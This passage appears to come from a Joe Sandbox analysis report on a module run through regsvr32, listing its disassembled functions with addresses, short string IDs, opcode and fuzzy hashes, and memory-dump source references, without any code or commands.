                                                                                                                                • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                • Instruction ID: 4587e6e4ec48ed0d55ab2640bfae216482b7ee6df91dafe03bb8a520f2764b0b
                                                                                                                                • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                • Instruction Fuzzy Hash: F1E086A7E0460742EB089F71D44437432D1EF94B59F088035CA0C412F5DF7CC696C741
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800125C4 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: cYte
                                                                                                                                • API String ID: 0-489798635
                                                                                                                                • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                                                                                • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002A9A8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Pc
                                                                                                                                • API String ID: 0-2609325410
                                                                                                                                • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                                                                                • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001ED50 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: g >
                                                                                                                                • API String ID: 0-3862707646
                                                                                                                                • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                                                                                • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180018DAC Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 2
                                                                                                                                • API String ID: 0-2012265552
                                                                                                                                • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                                                                                • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800288B8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Wcl
                                                                                                                                • API String ID: 0-2623992880
                                                                                                                                • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                                                                                • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180029888 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ws8
                                                                                                                                • API String ID: 0-2196714860
                                                                                                                                • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                                                                                • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180017908 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: p/g
                                                                                                                                • API String ID: 0-1786412500
                                                                                                                                • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                                                                                • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000131C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: %
                                                                                                                                • API String ID: 0-3714942587
                                                                                                                                • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                                                                                • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000D8C4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: A.}
                                                                                                                                • API String ID: 0-2880059976
                                                                                                                                • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                                                                                • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180001D68 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0#
                                                                                                                                • API String ID: 0-456275806
                                                                                                                                • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                                                                                • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180008CA0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: n)
                                                                                                                                • API String ID: 0-1227437150
                                                                                                                                • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                                                                                • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001EB30 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: H&0
                                                                                                                                • API String ID: 0-1691334370
                                                                                                                                • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                                • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002870C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <+o
                                                                                                                                • API String ID: 0-2035106886
                                                                                                                                • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                                • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180015388 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 2d
                                                                                                                                • API String ID: 0-3866551247
                                                                                                                                • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                                • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800250CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ZF{;
                                                                                                                                • API String ID: 0-2351138993
                                                                                                                                • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                                • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180011834 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: o^
                                                                                                                                • API String ID: 0-3380573087
                                                                                                                                • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                                • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180017CE4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8N
                                                                                                                                • API String ID: 0-1657423088
                                                                                                                                • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                                • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180002178 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: J3n
                                                                                                                                • API String ID: 0-3694000235
                                                                                                                                • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                                • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001F7C0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: c&A
                                                                                                                                • API String ID: 0-649646960
                                                                                                                                • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                                • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800029BC Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (3
                                                                                                                                • API String ID: 0-2570504824
                                                                                                                                • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                                • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002C7B4 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: [r\^
                                                                                                                                • API String ID: 0-4041245994
                                                                                                                                • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                                • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019FDC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X
                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                                                                                • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180002790 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: [[x
                                                                                                                                • API String ID: 0-2553898450
                                                                                                                                • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                                • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001E960 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: g\&
                                                                                                                                • API String ID: 0-1994035986
                                                                                                                                • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                                • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000338C Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
